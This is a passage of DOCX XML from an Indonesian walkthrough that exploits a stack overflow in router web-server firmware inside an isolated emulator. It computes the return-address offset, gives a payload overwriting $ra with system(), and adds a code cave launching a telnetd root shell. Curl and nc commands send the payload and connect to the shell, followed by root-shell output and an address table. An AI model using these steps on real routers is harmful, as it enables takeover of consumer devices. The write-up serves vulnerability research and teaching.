            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="bn_decompiler_vuln_ann.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852160" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 8. Binary Ninja (HLIL) form_fast_setting_wifi_set — kotak merah: dua strcpy(dest, ssid) tanpa cek panjang (sumber overflow).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Fungsi lain dengan pola serupa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Beberapa fungsi lain (SetSpeedWan, SetClientState, dll.) memakai pola penyalinan berisiko; ini menjelaskan banyaknya CVE pada lini firmware ini. Untuk PoC kita fokus ke satu yang paling jelas dan stabil.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Tahap 4 — Menghitung 'Titik Kritis' (offset return address)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Supaya luberan data tepat mengenai return address, kita harus tahu JARAK dari awal buffer ke posisi return address. Dari pembacaan kode: buffer kedua ada di fp+0x90, sedangkan return address disimpan di fp+892. Maka jaraknya 748 byte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="3432775"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig3_stack.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3432775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 9. Peta memori: 748 byte mengisi variabel, byte ke-749 menimpa return address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kita buktikan secara hidup dengan debugger: kirim 748 huruf 'A' lalu 4 huruf 'ABCD'. Saat dicek, nilai return address berubah persis menjadi 0x44434241 (yaitu 'ABCD' -&gt; A=41,B=42,C=43,D=44). Ini membuktikan offset 748 benar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>saved $ra  terbaca = 0x44434241   untuk payload 748 x 'A' + 'ABCD'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="3291840"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="02_gdb_crash.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3291840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 10. Bukti crash saat return address rusak (di GDB).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 Trik penting: alamat 3 byte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Alamat fungsi system() adalah 0x005047c0, yang jika ditulis penuh 4 byte berakhir dengan byte 00 (NUL). Karena strcpy berhenti saat menemui NUL, kita cukup mengirim 3 byte (c0 47 50); NUL akan ditambahkan otomatis di posisi 749. Ini penting supaya pointer 'req' di fp+896 tidak ikut rusak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payload = b'A'*748 + bytes([0xc0,0x47,0x50])   # 751 byte -&gt; $ra = 0x005047c0 (system)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Tahap 5 — Menyiapkan Emulator Terisolasi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kita jalankan firmware di dalam QEMU (komputer virtual) di dalam container. Tanpa isolasi, eksploit bisa tidak sengaja menyerang router asli. Jadi: guest hanya terhubung lewat user-net, dan diakses dari host via port-forward.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="2876414"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig5_isolation.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="2876414"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 11. Arsitektur isolasi: router asli sama sekali tidak disentuh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Agar server web benar-benar mau menyala, kita menambal lingkungan emulasi: menyediakan layanan konfigurasi (CFM) yang ditunggu httpd, dan mengganti skrip start agar stabil. Setelah itu httpd listen di 10.0.2.15:80 dan bisa diakses dari container di 127.0.0.1:8080.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4206240" cy="4448997"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="30_memory_layout.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4206240" cy="4448997"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 12. Tata letak memori MIPS (referensi belajar).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. Tahap 6 — Eksekusi &amp; Menang</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.1 Peluru terakhir: membelokkan alamat kode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="2431549"/>
            <wp:docPr id="13" name="Picture 13"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig7_addr_math.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="2431549"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 13. Rumus alamat: base + offset. Kesalahan di sini membuat program crash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kita menaruh kode kecil ('gua') di dalam program dan mengubah satu instruksi di akhir fungsi supaya melompat ke gua. Gua itu mengisi register argumen dengan teks perintah 'telnetd -l /bin/sh -p 2323', lalu memanggil system().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="2939768"/>
            <wp:docPr id="14" name="Picture 14"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig4_exploit_flow.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="2939768"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 14. Rantai exploit: dari form SSID sampai shell root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.2 Bukti kontrol alamat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="3291840"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="03_gdb_win.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3291840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 15. Di GDB: alamat kendali ($pc/$ra) berhasil dibajak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9.3 Menjalankan serangan &amp; mengambil shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 1) login backdoor -&gt; cookie</w:t>
        <w:br/>
        <w:t>CK=$(curl -s -i -X POST http://172.17.0.2:8080/login/Auth -d 'username=user&amp;password=user' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">     | sed -n 's/.*password=\([^;]*\).*/\1/p')</w:t>
        <w:br/>
        <w:br/>
        <w:t># 2) kirim payload overflow</w:t>
        <w:br/>
        <w:t>curl -X POST http://172.17.0.2:8080/goform/fast_setting_wifi_set \</w:t>
        <w:br/>
        <w:t xml:space="preserve">     --data @payload.txt -H "Cookie: password=$CK"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 3) sambung shell root di port 2323</w:t>
        <w:br/>
        <w:t>nc 172.17.0.2 2323</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Keluaran nyata (bukti): HTTP/1.0 302 adalah respon httpd yang sehat; setelah payload, koneksi putus (program crash karena sengaja kita bajak), lalu shell terbuka di port 2323.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/ # uname -a</w:t>
        <w:br/>
        <w:t>Linux (none) 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux</w:t>
        <w:br/>
        <w:t>/ # cat /etc/passwd</w:t>
        <w:br/>
        <w:t>root::0:0:root:/root:/bin/sh</w:t>
        <w:br/>
        <w:t>/ # echo RCE-PWNED-AC6V2</w:t>
        <w:br/>
        <w:t>RCE-PWNED-AC6V2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="3444563"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="RPT_EXPLOIT_ann.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3444563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 16. Terminal asli: eksekusi PoC pwntools (cookie, payload, crash, sambung shell 2323).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="3444563"/>
            <wp:docPr id="17" name="Picture 17"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="RPT_SHELL_ann.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3444563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 17. Terminal asli: shell ROOT di guest (Uid 0, /etc/passwd root, proses telnetd).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Catatan: whoami/id tidak tersedia di busybox firmware; identitas dibuktikan lewat /proc/self/status (Uid: 0) dan /etc/passwd (root).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Peta Alamat &amp; Artefak (untuk verifikasi ulang)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9"/>
              </w:rPr>
              <w:t>Nama</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alamat / Nilai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Keterangan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>system()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0x005047c0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fungsi yang kita panggil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>doSystemCmd()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0x00505380</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alternatif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>execve()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0x00504400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>alternatif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>strcpy()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0x00504820</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>biang overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>offset return address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>748</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dari buffer kedua (fp+0x90)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>slot return address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>fp+892</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>tempat saved $ra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>gua (cave)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0x0050b3d0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>kode pequbahan kecil; base 0x400000 + offset 0x10b3d0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>teks perintah</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0x0050b450</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>telnetd -l /bin/sh -p 2323</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Artefak &amp; hash (md5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
